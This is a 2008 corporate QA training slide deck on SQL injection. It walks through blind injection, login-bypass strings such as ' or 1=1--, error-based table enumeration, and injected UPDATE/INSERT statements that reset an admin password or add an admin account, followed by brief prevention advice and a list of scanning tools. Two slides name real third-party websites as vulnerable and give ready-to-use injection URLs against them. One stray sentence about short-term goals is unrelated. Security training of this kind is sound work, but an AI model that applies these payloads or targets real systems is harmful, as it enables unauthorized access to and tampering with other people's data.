SQL Injections

Core QA Team 5th March 2008

Agenda
 What is SQL Injection  SQL Injection possibilities  Technologies affected by SQL Injections  Types of SQL Injections  Techniques in SQL Injections  How to use Blind SQL Injections  How to use SQL Injections  How to use Advanced SQL Injections  How update data in the Database  How to avoid SQL Injections  Next generation of Hacking  Tools for SQL Injections
2
Copyright Kenexa 2004

What is SQL Injection

SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database. In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.

3
Copyright Kenexa 2004

SQL Injection possibilities

Using SQL injections, attackers can: Add new data to the database Could be embarrassing to find yourself selling politically incorrect items on an eCommerce site Perform an INSERT in the injected SQL Modify data currently in the database Could be very costly to have an expensive item suddenly be deeply discounted Perform an UPDATE in the injected SQL Often can gain access to other users system capabilities by obtaining their password

4
Copyright Kenexa 2004

Technologies affected by SQL Injections

JSPASPXML XSL JavascriptVB MFC and other ODBC-based tools APIs3- and 4GL-based languages such as C, OCI, Pro*C, and COBOL Perl CGI scripts that access Oracle databases many more

5
Copyright Kenexa 2004

Types of SQL Injections

Blind SQL injections SQL injections Advanced SQL injects

6
Copyright Kenexa 2004

Techniques in SQL Injections

Authorization bypass Using the SELECT command Using the INSERT command Using SQL server stored procedures

7
Copyright Kenexa 2004

How to use Blind SQL injection

Step1- For instance, many companies allow Internet access to archives of their press releases. A URL for accessing the companys fifth press release might look like this: http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 Step2-For example, if you request this URL http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND 1=1 if this query also returns the same press release, then the application is susceptible to SQL injection Step-3 . We can use this behavior to ask the database server true/false questions. For instance, the following request essentially asks the database server, Is the current user john? http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND USER_NAME() = john
8
Copyright Kenexa 2004

How to use Blind SQL injection

USER_NAME() is a SQL Server function that returns the name of the current user. If the current user is dbo (administrator), the fifth press release will be returned. If not, the query will fail and no press release will be displayed Step4 - By combining sub queries and functions, we can ask more complex questions. The following example attempts to retrieve the name of a database table, one character at a time. http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 109 Step5 - If the server returns the fifth press release in response to this URL, we know that the first letter of the querys result comes after the letter m (ASCII character 109) in the alphabet. By making multiple requests, we can determine the precise ASCII value.

9
Copyright Kenexa 2004

How to use Blind SQL injection

http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116

Step 6 - If no press release is returned, the ASCII value is greater than 109 but not greater than 116. So, the letter is between n (110) and t (116). http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 113

10
Copyright Kenexa 2004

URLs venerable to Blind SQL Injections attack

http://www.bharatstudent.com/cafebharat/cafebharat.php?cat=2%20and %201=1 http://contentind.cricinfo.com/wivzimsa/engine/current/match/298809.html%20and% 201=1 http://www.minglebox.com/user.do?method=registerUser&error=true%20 and%20USERINFO_NAME="raj

11
Copyright Kenexa 2004

How to use SQL injections

12
Copyright Kenexa 2004

How to use SQL injections

Here is a sample basic HTML form with two inputs, login and password. <form method="post" action="http://testasp.acunetix.com/login.asp"> <input name="tfUName" type="text" id="tfUName"> <input name="tfUPass" type="password" id="tfUPass"> </form>

The easiest way for the login.asp to work is by building a database query that looks like this: SELECT id FROM logins WHERE username = '$username' AND password = '$password
13
Copyright Kenexa 2004

How to use SQL injections

If the variables $username and $password are requested directly from the user's input, this can easily be compromised. Suppose that we gave "Joe" as a username and that the following string was provided as a password: anything' OR 'x'='x SELECT id FROM logins WHERE username = 'Joe' AND password = 'anything' OR 'x'='x' Make sure that your short term goals will help to achieve the Medium term goals and vice versa.

14
Copyright Kenexa 2004

How to use SQL injections

As the inputs of the web application are not properly sanitised, the use of the single quotes has turned the WHERE SQL command into a two-component clause. The 'x'='x' part guarantees to be true regardless of what the first part contains. This will allow the attacker to bypass the login form without actually knowing a valid username / password combination! Depending on the actual SQL query, you may have to try some of these possibilities: ' or 1=1-or 1=1-or 1=1-' or 'a'='a " or "a"="a ') or ('a'='a
15
Copyright Kenexa 2004

URLs venerable to Blind SQL Injections attack

http://www.osmania.ac.in/ou/res07/20080126.jsp http://www.powerscrap.com/frame.aspx?Login=true

16
Copyright Kenexa 2004

How to use Advanced SQL injects

The attacker could log in as the first user in the 'users' table, with the following input: Username: ' or 1=1- The attacker wants to establish the names of the tables that the query operates on, and the names of the fields. To do this, the attacker uses the 'having' clause of the 'select' statement: Username: ' having 1=1 So the attacker now knows the table name and column name of the first column in the query. They can continue through the columns by introducing each field into a 'group by' clause, as follows: Username: ' group by users.id having 1=1-

17
Copyright Kenexa 2004

How to use Advanced SQL injects

(which produces the error) Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login.asp, line 35

Eventually the attacker arrives at the following 'username': ' group by users.id, users.username, users.password, users.privs having 1=1 which produces no error, and is functionally equivalent to: select * from users where username = ''

It would be useful if he could determine the types of each column. This can be achieved using a 'type conversion' error message, like this: Username: ' union select sum(username) from users-18
Copyright Kenexa 2004

How update data in the Database

When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo": http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'-To INSERT a new record into the database: http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')-We can now login as "neo2" with the password of "newpas5".

19
Copyright Kenexa 2004

How to avoid SQL Injections

Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from: - Input from users - Parameters from URL - Values from cookie For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab. Delete stored procedures that you are not using like: master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

20
Copyright Kenexa 2004

Next generation of Hacking

Ethical Hacking Server side scripting Client side scripting Bluetooth Hacking Console Hacking

21
Copyright Kenexa 2004

Tools for SQL Injection

SQID Sequel Injection Digger SQLBrute - SQL Injection Brute Force Tool N-Stalker Web Application Security Scanner 2006 Acunetix Web Vulnerable Scanner HP Web Inspect Wikto: Web Server Assessment Tool

22
Copyright Kenexa 2004

References

http://www.unixwiz.net/techtips/sql-injection.html http://www.imperva.com/resources/glossary/sql_injection.html http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt http://www.security-hacks.com/2007/05/18/top-15-free-sql-injectionscanners

23
Copyright Kenexa 2004

24
Copyright Kenexa 2004

www.kenexa.com